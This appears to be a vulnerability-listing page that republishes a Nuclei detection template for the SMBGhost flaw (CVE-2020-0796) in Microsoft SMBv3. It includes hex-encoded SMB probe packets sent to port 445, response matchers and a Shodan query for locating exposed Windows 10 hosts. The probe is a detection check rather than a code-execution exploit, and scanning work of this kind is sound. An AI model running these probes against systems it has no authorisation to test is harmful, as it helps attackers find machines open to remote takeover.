CVE-2020-0796: Microsoft SMBv3 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Microsoft SMBv3 | POC: 已公开

漏洞描述

A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.

PoC代码[已公开]

id: CVE-2020-0796

info:
  name: Microsoft SMBv3 - Remote Code Execution
  author: Yusuf Amr
  severity: critical
  description: |
    A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
    - https://github.com/tdevworks/CVE-2020-0796-SMBGhost-Exploit-Demo
    - http://packetstormsecurity.com/files/156731/CoronaBlue-SMBGhost-Microsoft-Windows-10-SMB-3.1.1-Proof-Of-Concept.html
    - http://packetstormsecurity.com/files/156980/Microsoft-Windows-10-SMB-3.1.1-Local-Privilege-Escalation.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2020-0796
    cwe-id: CWE-119
    epss-score: 0.94424
    epss-percentile: 0.99981
    cpe: cpe:2.3:o:microsoft:windows_10_1903:-:*:*:*:*:*:arm64:*
  metadata:
    vendor: microsoft
    product: windows_10_1903
    shodan-query: cpe:"cpe:2.3:o:microsoft:windows_10_1903"
    verified: true
  tags: cve,cve2020,microsoft,smb,kev,vkev,vuln

tcp:
  - host:
      - "{{Hostname}}"

    port: 445

    inputs:
      - data: "{{hex_decode(\"000000c2fe534d4240000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024000800000000007f0000000102abcd0102abcd0102abcd0102abcd7800000002000000020210022202240200030203100311030000000001002600000000000100200001000000000000000000000000000000000000000000000000000000000000000000000003000a0000000000010000000100000001000000000000000000\")}}"

        read: 8192

      - data: "{{hex_decode(\"000000a0fc534d42ffffffff0100000080000000fe534d424000000000000000010000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000001900000200000000000000005800280000000000000000004e544c4d5353500001000000329088e2000000002800000000000000280000000601b11d0000000f00000000000000000000000000000000\")}}"

    matchers-condition: and
    matchers:
      - type: binary
        part: data
        encoding: hex
        binary:
          - "fc534d4248000000"
          - "0d0000c0"
          - "1000602d00"
        condition: or

      - type: binary
        part: data
        encoding: hex
        binary:
          - "00000031fc534d424800000001000000000000001eb000fe534d4240000000c00d0000c00100011000602d00100103301e28090442"
# digest: 4a0a00473045022004a52adbf954c684e5f5c24d56724f3f7b34a24afd742d2ca2fd260e4dcd5be8022100a9f3423be68b9ffab0d654bda6f9bbab18acc87beebe7f1949d23414a054ee74:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/network/cves/2020/CVE-2020-0796.yaml

相关漏洞推荐